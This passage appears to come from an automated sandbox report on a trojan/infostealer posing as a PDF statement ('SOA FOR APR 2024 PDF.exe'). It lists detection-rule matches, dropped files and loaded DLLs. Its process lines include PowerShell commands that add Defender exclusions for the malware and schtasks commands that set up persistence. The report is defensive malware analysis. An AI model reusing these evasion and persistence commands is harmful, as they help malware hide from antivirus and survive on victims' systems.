                    Source: 21.2.BjTxJte.exe.45fc310.7.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 10.2.eeBIYZL.exe.3fe9420.5.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 21.2.BjTxJte.exe.4637330.6.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 10.2.eeBIYZL.exe.3fae400.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.48bb2a8.5.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 15.2.BjTxJte.exe.4bec170.7.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 15.2.BjTxJte.exe.4c27190.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.48f62c8.7.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 10.2.eeBIYZL.exe.3fe9420.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.48bb2a8.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 21.2.BjTxJte.exe.4637330.6.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 10.2.eeBIYZL.exe.3fae400.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 21.2.BjTxJte.exe.45fc310.7.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: SOA FOR APR 2024 PDF.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: eeBIYZL.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.3b69970.6.raw.unpack, V4uC3Iifq56IKQcfry.cs Cryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.48bb2a8.5.raw.unpack, G39cBQ.cs Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.48bb2a8.5.raw.unpack, sDtvQjPGfa.cs Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.48bb2a8.5.raw.unpack, b1PPCKov2KZ.cs Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.48bb2a8.5.raw.unpack, b1PPCKov2KZ.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.475f6b0.8.raw.unpack, URqoV1LhkZEcr5B7SE.cs Security API names: _0020.SetAccessControl
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.475f6b0.8.raw.unpack, URqoV1LhkZEcr5B7SE.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.475f6b0.8.raw.unpack, URqoV1LhkZEcr5B7SE.cs Security API names: _0020.AddAccessRule
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.475f6b0.8.raw.unpack, OcGry4VRIcmlRjnwWl.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.2dc61f0.3.raw.unpack, ReactionVessel.cs Suspicious method names: .ReactionVessel.Inject
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.2bb1d80.0.raw.unpack, ReactionVessel.cs Suspicious method names: .ReactionVessel.Inject
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.2bc2120.1.raw.unpack, ReactionVessel.cs Suspicious method names: .ReactionVessel.Inject
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.2db5b90.2.raw.unpack, ReactionVessel.cs Suspicious method names: .ReactionVessel.Inject
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.53b0000.10.raw.unpack, ReactionVessel.cs Suspicious method names: .ReactionVessel.Inject
                    Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@33/20@2/2
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe File created: C:\Users\user\AppData\Roaming\eeBIYZL.exe
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe Mutant created: NULL
                    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7172:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7744:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7260:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6172:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8152:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe Mutant created: \Sessions\1\BaseNamedObjects\HlKnubZ
                    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7464:120:WilError_03
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe File created: C:\Users\user\AppData\Local\Temp\tmpCB26.tmp
                    Source: SOA FOR APR 2024 PDF.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe File read: C:\Users\user\Desktop\desktop.ini
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: SOA FOR APR 2024 PDF.exe ReversingLabs: Detection: 44%
                    Source: SOA FOR APR 2024 PDF.exe Virustotal: Detection: 52%
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe File read: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe
                    Source: unknown Process created: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe "C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe"
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eeBIYZL.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eeBIYZL" /XML "C:\Users\user\AppData\Local\Temp\tmpCB26.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe Process created: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe "C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe"
                    Source: unknown Process created: C:\Users\user\AppData\Roaming\eeBIYZL.exe C:\Users\user\AppData\Roaming\eeBIYZL.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eeBIYZL" /XML "C:\Users\user\AppData\Local\Temp\tmpE2E4.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe Process created: C:\Users\user\AppData\Roaming\eeBIYZL.exe "C:\Users\user\AppData\Roaming\eeBIYZL.exe"
                    Source: unknown Process created: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eeBIYZL" /XML "C:\Users\user\AppData\Local\Temp\tmp9B5.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe Process created: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe Process created: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                    Source: unknown Process created: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eeBIYZL" /XML "C:\Users\user\AppData\Local\Temp\tmp2ADA.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe Process created: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe Section loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, dwrite.dll, amsi.dll, userenv.dll, msasn1.dll, gpapi.dll, windowscodecs.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, ntmarta.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, amsi.dll, userenv.dll, profapi.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, wldp.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll, microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll, wbemcomn.dll
                    Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll, taskschd.dll, sspicli.dll
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe Section loaded: mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, wbemcomn.dll, amsi.dll, userenv.dll, sspicli.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, secur32.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, msasn1.dll, gpapi.dll, ntmarta.dll, vaultcli.dll, wintypes.dll, edputil.dll, windowscodecs.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: rasapi32.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: rasman.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: rtutils.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: secur32.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: ntmarta.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: vaultcli.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: edputil.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: dwrite.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: propsys.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: edputil.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: netutils.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: appresolver.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: bcp47langs.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: slc.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: sppc.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ucrtbase_clr0400.dll
